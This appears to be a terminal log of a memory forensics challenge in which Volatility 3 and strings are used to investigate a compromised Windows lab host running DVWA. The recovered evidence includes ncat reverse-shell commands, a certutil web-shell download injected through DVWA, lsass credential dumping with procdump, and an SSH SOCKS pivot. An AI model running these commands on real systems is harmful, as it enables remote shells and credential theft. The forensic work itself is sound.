┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows\CurrentVersion\Run" Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Last Write Time Hive Offset Type Key Name Data Volatile ... 2023-07-12 04:42:30.000000 0xb98420e97000 REG_SZ \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False 2023-07-12 04:42:29.000000 0xb98421072000 REG_SZ \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "ncat" | sort --unique | grep 'schtask' ]0;Administrator: Command Prompt - schtasks /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ strings SECURITYNIK-WIN-20231116-235706.dmp > strings.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep "10.0.0.110" strings.txt | grep certutil .0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=SubmitP 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php . 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php . cmd.exe /s /c "ping 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ." 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php . 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php . ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit_ ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit"M{ ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.phppload%5Cshell.php+.&Submit=Submit ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.devicetree.DeviceTree > devicetree.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d' | wc --lines 30
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d'
48 FILE_DEVICE_UNKNOWN
21 FILE_DEVICE_DISK
19 FILE_DEVICE_NETWORK
18 UNKNOWN
12 FILE_DEVICE_BUS_EXTENDER
9 FILE_DEVICE_MOUSE
9 FILE_DEVICE_DISK_FILE_SYSTEM
9 FILE_DEVICE_CONTROLLER
7 FILE_DEVICE_NETWORK_FILE_SYSTEM
5 FILE_DEVICE_KS
3 FILE_DEVICE_VIDEO
3 FILE_DEVICE_NAMED_PIPE
3 FILE_DEVICE_CD_ROM
2 FILE_DEVICE_NULL
2 FILE_DEVICE_MAILSLOT
2 FILE_DEVICE_ACPI
2
1 FILE_DEVICE_TRANSPORT
1 FILE_DEVICE_TAPE_FILE_SYSTEM
1 FILE_DEVICE_SOUND
1 FILE_DEVICE_SERIAL_PORT
1 FILE_DEVICE_SCREEN
1 FILE_DEVICE_PHYSICAL_NETCARD
1 FILE_DEVICE_NETWORK_BROWSER
1 FILE_DEVICE_KSEC
1 FILE_DEVICE_KEYBOARD
1 FILE_DEVICE_CD_ROM_FILE_SYSTEM
1 FILE_DEVICE_BEEP
1 FILE_DEVICE_BATTERY
1 FILE_DEVICE_8042_PORT
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat devicetree.txt | grep --perl-regexp 'HTTP|ClientSession' 0xe78beff21e50 DRV HTTP N/A N/A N/A * 0xe78beff21e50 DEV HTTP ClientSession N/A FILE_DEVICE_NETWORK
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "known_hosts" | sort --unique 4known_hosts (C:\Users\administrator.SECURITYNIK-WIN\.ssh) 4known_hosts (C:\Users\securitynik\.ssh) *!C:\Users\administrator.SECURITYNIK-WIN\.ssh\known_hosts.old !C:\Users\securitynik\.ssh\known_hosts C:\Users\securitynik/.ssh/known_hosts C:\Users\securitynik/.ssh/known_hosts2 !C:\Users\securitynik\.ssh\known_hosts.old
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'ssh\s+\-D' ssh -D 9999 kali@10.0.0.110 -N -vvv ]0;Administrator: Windows PowerShell - ssh -D 9999 kali@10.0.0.110 -N -vvv
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "chrome" | grep "127.0.0.1:9999" chrome.exe --proxy-server="socks5://127.0.0.1:9999" "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --proxy-server=socks5://127.0.0.1:9999 --mojo-platform-channel-handle=2144 --field-trial-handle=1868,i,3512365481249750963,10747349760151142710,262144 /prefetch:8 chrome.exe --proxy-server="socks5://127.0.0.1:9999" chrome.exe --proxy-server="socks5://127.0.0.1:9999"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ strings SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'http*://10.0.0.108:(443|9999).*' --only-matching | sort --unique | grep --perl-regexp '(\.exe|\.txt)' | sed 's/"//' http://10.0.0.108:9999/putty_64.exe http://10.0.0.108:9999/putty_64.exe) http://10.0.0.108:9999/putty.exe http://10.0.0.108:9999/putty.exe http://10.0.0.108:9999/putty_x64.exe http://10.0.0.108:9999/putty_x64.md5.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ strings SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'putty.*?\.exe' | grep --ignore-case --perl-regexp "^c:.*?\.exe$" C:\Users\securitynik\Downloads\putty_x64 (2).exe C:\Users\securitynik\Downloads\putty_64.exe C:\TOOLS\elitewrap\original_putty.exe C:\Users\securitynik\Downloads\putty.exe C:\Users\securitynik\Downloads\putty.exe C:\Users\securitynik\Downloads\putty_new.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.filescan > filescan.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | wc --lines 8029
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | uniq | head --lines -6 | wc --lines 3227
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | head --lines=10 1480 \$Directory 469 \Program 359 \Users\securitynik\AppData\Local\Google\Chrome\User 223 \$MapAttributeValue 172 \Users\securitynik\AppData\Local\Microsoft\Edge\User 158 \CMNotify 140 \Windows\System32 109 \Windows\Registration\R000000000006.clb 107 \Endpoint 77 \Windows\System32\svchost.exe ....
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | grep ".txt" 1 \xampp\readme_de.txt 1 \Windows\appcompat\pca\PcaAppLaunchDic.txt 1 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | tail --lines=2 | sort --unique \;Z:00000000000fc3bd\vmware-host\Shared
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ mkdir powershell_history && ls powershell_history
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep "\ConsoleHost_history.txt" 0xe78bf2f82a00 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir powershell_history/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf2f82a00 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf2f82a00 ConsoleHost_history.txt file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat powershell_history/file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat Invoke-WebRequest -Uri http://10.0.0.106/putty.exe dir cd .. dir Invoke-WebRequest -Uri http://10.0.0.106/putty.exe putty.exe exit d: cmd exit cd \ cd tools cd .\SysinternalsSuite\ .\procdump.exe -ma lsass.exe c:\tmp\lsass.dmp ps .\procdump.exe -ma TabTip tabtip.dmp .\procdump.exe -ma msedge.exe msedge.dmp del *.tmp del *.dmp dir *.dmp del .\notepad.dmp .\firefox.dmp del .\FindLinks.exe del .\firefox.dmp cd \ cd tools cd .\SysinternalsSuite\ del .\firefox.dmp .\procdump.exe -ma msedge.exe c:\tmp\edge.dmp dir c:\tmp\edge.dmp .\procdump.exe -ma lsass.exe c:\tmp\lsass.exe.dmp dir c:\tmp .\procdump64.exe /? .\procdump.exe -64 -ma lsass.exe c:\tmp\lsass.exe.dmp .\procdump.exe -accepteula -64 -ma lsass.exe c:\tmp\lsass.exe.dmp cls psexec -h cmd cd 'C:\Program Files\' dir cd .. cd '.\Program Files (x86)\' dir cd .\Microsoft\ dir cd .\Edge\ dir cd .\Application\ dir cd .\114.0.1823.79\ dir .\msedge.exe --proxy-server="socks5://127.0.0.1:9999" cd "c:\Program Files (x86)\Google\Chrome\Application\" cd "c:\Program Files (x86)\Google\Chrome\Application\"cd .. cd .. cd \ cd '.\Program Files\' dir cd .\Google\ dir cd .\Chrome\ dir cd .\Application\ dir chrome.exe --proxy-server="socks5://127.0.0.1:9999" dir chrome.exe --proxy-server="socks5://127.0.0.1:9999" cmd dir /s c:\nmap.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ mkdir ncat_dump
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e4f250 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf6e4f250 ncat-ifeo.bat file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep --perl-regexp '\.bat' 0xe78bf6e4f250 \TOOLS\ncat-ifeo.bat 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat cmd.exe /c start c:\tools\ncat.exe --nodns --verbose 10.0.0.110 80 --exec cmd.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep ncat.exe 0xe78bf6aa7120 \Program Files (x86)\Nmap\ncat.exe 216 0xe78bf6ad55c0 \Program Files (x86)\Nmap\ncat.exe 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6aa7120 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result ImageSectionObject 0xe78bf6aa7120 ncat.exe file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6ad55c0 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result ImageSectionObject 0xe78bf6ad55c0 ncat.exe file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ md5sum ncat_dump/* 89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img 89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img 45860d2ded9caca15c1d10e756e1a0c7 ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ md5sum ncat_dump/* 89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img 89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ file ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: PE32 executable (console) Intel 80386, for MS Windows, 5 sections
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --section-headers ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: file format pei-i386 Sections: Idx Name Size VMA LMA File off Algn 0 .text 000442dd 002e1000 002e1000 00000400 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 1 .rdata 0000ccce 00326000 00326000 00044800 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 2 .data 00000600 00333000 00333000 00051600 2**2 CONTENTS, ALLOC, LOAD, DATA 3 .rsrc 000001e0 00336000 00336000 00051c00 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 4 .reloc 00003400 00337000 00337000 00051e00 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --all-headers | grep 'AddressOfEntryPoint' BFD: error: ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img(.reloc) is too large (0x3400 bytes) AddressOfEntryPoint 00044663
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ exiftool ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img ExifTool Version Number : 12.67 File Name : file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img Directory : ncat_dump File Size : 339 kB File Modification Date/Time : 2023:12:07 09:35:35-05:00 File Access Date/Time : 2023:12:07 09:36:19-05:00 File Inode Change Date/Time : 2023:12:07 09:35:35-05:00 File Permissions : -rw------- File Type : Win32 EXE File Type Extension : exe MIME Type : application/octet-stream Machine Type : Intel 386 or later, and compatibles Time Stamp : 2023:05:19 23:12:28-04:00 Image File Characteristics : Executable, 32-bit PE Type : PE32 Linker Version : 14.29 Code Size : 279552 Initialized Data Size : 76288 Uninitialized Data Size : 0 Entry Point : 0x44663 OS Version : 6.0 Image Version : 0.0 Subsystem Version : 6.0 Subsystem : Windows command line
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ xxd -len 128 ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img 00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ.............. 00000010: b800 0000 0000 0000 4000 0000 0000 0000 ........@....... 00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000030: 0000 0000 0000 0000 0000 0000 1801 0000 ................ 00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ........!..L.!Th 00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno 00000060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS 00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode....$.......
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep --perl-regexp "\.pf" | awk --field-separator=' ' '{ print $2 }' | sort --unique | wc --lines 45
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep certutil -i 0xe78bf6e6ba90 \Windows\System32\certutil.exe 216 0xe78bf6e6e7e0 \Windows\Prefetch\CERTUTIL.EXE-28F1E0C1.pf 216 0xe78bf7934500 \Windows\System32\en-US\certutil.exe.mui 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ sha256sum certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img e886ee1a0f92803e4b884ff099d9bbc717fe3cc6cd86f719d52f132776226493 certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat netstat.txt | grep http 0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000 0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000 0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000 0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000 0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000 0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep httpd 10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled 5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep "access.log" 0xe78bf4c62130 \xampp\apache\logs\access.log 216 0xe78bf6e72980 \xampp\apache\logs\access.log 216 0xe78bf6e72ca0 \xampp\apache\logs\access.log 216 0xe78bf6e75d10 \xampp\apache\logs\access.log 216 0xe78bf6e76800 \xampp\apache\logs\access.log 216 ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep "access.log" | wc --lines 5 ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ mkdir access_log
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf4c62130 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat SharedCacheMap 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e72980 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat SharedCacheMap 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e72ca0 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat SharedCacheMap 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e75d10 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat SharedCacheMap 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e76800 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat SharedCacheMap 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ls file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024/access_log] └─$ ls | wc --lines 10
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat access_log/* | sort --unique | awk --field-separator='-' '{ print $1 }' | sort | uniq --count ... 57 10.0.0.1 19 10.0.0.110
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat access_log/* | sort --unique | grep --color=always --text 'curl' 10.0.0.110 - - [16/Nov/2023:18:19:50 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:20:11 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:24:45 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:26:37 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:26:54 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:28:01 -0500] "GET /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 404 297 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:28:09 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:28:25 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:36:02 -0500] "GET /dvwa/hackable/uploads/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:36:09 -0500] "GET /dvwa/hackable/upload/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:37:32 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 29 "-" "curl/8.4.0" 10.0.0.110 - - [16/Nov/2023:18:41:22 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 2888 "-" "curl/8.4.0"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep dvwa 0xe78bf4c54e40 \xampp\htdocs\dvwa\dvwa\css\main.css 216 0xe78bf620d400 \xampp\htdocs\dvwa\config 216 0xe78bf620e530 \xampp\htdocs\dvwa\config 216 0xe78bf6aac8a0 \xampp\mysql\data\dvwa\db.opt 216 0xe78bf6ac6840 \xampp\htdocs\dvwa\vulnerabilities\exec\source\low.php 216 0xe78bf6e4fd40 \xampp\htdocs\dvwa\vulnerabilities\upload\index.php 216 0xe78bf6e5f100 \xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php 216 0xe78bf6e5f420 \xampp\htdocs\dvwa\config\config.inc.php 216 0xe78bf6e619a0 \xampp\htdocs\dvwa\index.php 216 0xe78bf6e635c0 \xampp\htdocs\dvwa\dvwa\js\dvwaPage.js 216 0xe78bf6e63d90 \xampp\htdocs\dvwa\dvwa\js\add_event_listeners.js 216 0xe78bf6e65b40 \xampp\htdocs\dvwa\favicon.ico 216 0xe78bf6e66c70 \xampp\mysql\data\dvwa\users.ibd 216 0xe78bf6e67da0 \xampp\htdocs\dvwa\dvwa\images\logo.png 216 0xe78bf6e680c0 \xampp\mysql\data\dvwa\guestbook.ibd 216 0xe78bf6e68a20 \xampp\htdocs\dvwa\vulnerabilities\upload\source\low.php 216 0xe78bf792b090 